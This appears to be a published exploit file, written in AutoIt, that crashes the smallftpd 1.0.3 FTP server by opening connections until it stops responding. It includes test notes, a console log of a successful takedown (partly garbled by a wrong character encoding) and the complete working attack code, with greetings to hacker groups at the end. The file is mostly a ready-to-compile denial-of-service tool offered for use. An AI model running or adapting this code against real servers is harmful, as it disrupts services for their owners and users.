#NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=aas.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#cs smallftpd 1.0.3.dos.au3
smallftpd 1.0.3 Denial Of Service (Remote Crash) exploit; This is simple exploit written in AutoIT that crashes Remote/Local smallftpd 1.0.3 FTP server If you want to use exploit then you've to compile it as CUI application. Official site of smallftpd 1.0.3 : => http://smallftpd.free.fr/ http://smallftpd.sourceforge.net/ http://sourceforge.net/projects/smallftpd/files/latest/download
===================================================== Tested *remotely*: From Windows Server 2003 against Win XP SP2 (32 bit) that runs smallftpd 1.0.3. Result: Remote denial of Service;App crashed. ===================================================== Tested (local scope) From Win XP SP 2 (32 bit)(192.168.0.1) against Win XP SP 2 32 bit( 192.168.0.15) that runs smallftpd 1.0.3. Result: Remote denial of Service;App crashed. ===================================================== Tested (local scope) from Win XP SP 2(32 bit) (192.168.0.1) against Windows 7 Ultimate SP 1 ( 192.168.0.15) that runs smallftpd 1.0.3. (<- with XP SP3 compatible mode) Result: Application didn't crashed but it is unable to accept any connection to port 21.
Here is the later testing result:
c:\dos\smalf\>ping 192.168.0.15
吾戾� 镟赍蜞扈 � 192.168.0.15 镱 32 徉轵:
悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=2祚 TTL=128 悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=5祚 TTL=128cls
羊囹桉蜩赅 Ping 潆� 192.168.0.15: 相赍蝾�: 铗镳噔脲眍 = 2, 镱塍麇眍 = 2, 镱蝈��眍 = 0 (0% 镱蝈瘘), 橡栳腓玷蝈朦眍� 怵屐� 镳桢爨-镥疱溧麒 � 祚:
c:\dos\smalf\>telnet 192.168.0.15 21 220- smallftpd 1.0.3 220- check http://smallftpd.free.fr for more information 220 report bugs to smallftpd@free.fr � 530 Not logged in.
c:\dos\smalf\>aas.exe 192.168.0.15 21
############################################################## ########## smallftpd 1.0.3 DENIAL OF SERVICE exploit ####### ########## Usage: aas.exe REMOTEIP REMOTEPORT ########## \\\\\\\\\\ HACKING IS LIFESTYLE! ////////// ##############################################################
################ WORKING ON IT! PLEASE WAIT...################ -------------------------------------------------------------- ~ TRY count: ~ 40 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 80 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 120 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 160 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 200 -------------------------------------------------------------- -------------------------------------------------------------- ~ TRY count: ~ 240 -------------------------------------------------------------- ############################################################## ########## Mission Completed! @267 ########## TARGET =>ftp://192.168.0.15:21/ is * DOWN ! * ############################################################## c:\dos\smalf\>telnet 192.168.0.15 21 项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�
c:\dos\smalf\>telnet 192.168.0.15 21 项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�
c:\dos\smalf\>ping 192.168.0.15
吾戾� 镟赍蜞扈 � 192.168.0.15 镱 32 徉轵:
悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=1祚 TTL=128 悟忮� 铗 192.168.0.15: 麒耠� 徉轵=32 怵屐�=1祚 TTL=128
羊囹桉蜩赅 Ping 潆� 192.168.0.15: 相赍蝾�: 铗镳噔脲眍 = 2, 镱塍麇眍 = 2, 镱蝈��眍 = 0 (0% 镱蝈瘘), 橡栳腓玷蝈朦眍� 怵屐� 镳桢爨-镥疱溧麒 � 祚: 惕龛爨朦眍� = 1祚尻, 锑犟桁嚯�铄 = 1 祚尻, 佯邃礤� = 1 祚尻 Control-C ^C c:\dos\smalf\>telnet 192.168.0.15 21 项潢膻麇龛� � 192.168.0.15...湾 箐嚯铖� 铗牮�� 镱潢膻麇龛� � �铎� 箸塍, 磬 镱痱 21: 厌铋 镱潢膻麇龛�
c:\dos\smalf\>ipconfig|find /i "192.168" IP-痿�� . . . . . . . . . . . . : 192.168.0.1 +庚��� 胞� . . . . . . . . . . : 192.168.0.1
/AkaStep
#ce #include <String.au3>
$f=_StringRepeat('#',10); $USE_PROTO='ftp://'; $INVALIDIP='INVALID IP FORMAT'; $INVALIDPORT='INVALID PORT NUMBER!'; $HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _ $f & " Usage: " & _ @ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _ StringReplace($f,'#','\') & _StringRepeat(' ',10) & _ 'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')
if $CmdLine[0]=0 Then MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _ 'Invoke It from MSDOS!',5) exit; EndIf if $CmdLine[0] <> 2 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf
$ip=StringMid($CmdLine[1],1,15);//255.255.255.255 $port=StringMid($CmdLine[2],1,5);//65535
validateall($ip,$port)
func validateall($ip,$port) if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then ConsoleWrite($INVALIDPORT); Exit; EndIf
TCPStartup(); $ip=TCPNameToIP($ip); TCPShutdown();
$z=StringSplit($ip,Chr(46));//Asc('.') if @error then ConsoleWrite($INVALIDIP); exit; EndIf
for $x=0 to $z[0] if Number($z[0]-1) <>3 Then ConsoleWrite($INVALIDIP); Exit EndIf
if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then ConsoleWrite($INVALIDIP); exit; EndIf Next
$x=0;
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF)
downit($ip,$port,$x)
EndFunc; =>validateall($ip,$port)
Func downit($ip,$port,$x) $x+=1; TCPStartup() $socket_con = -1 $socket_con = TCPConnect($ip, $port) If not @error Then
if Mod($x,40)=0 Then ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF) Sleep(Random(1000,1800,1)); EndIf
downit($ip,$port,$x)
Else
Beep(1000,1500) ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _ _StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62));
TCPShutdown(); exit; EndIf EndFunc; ==>downit($ip,$port,$x)
#cs
================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!* ================================================
#ce
|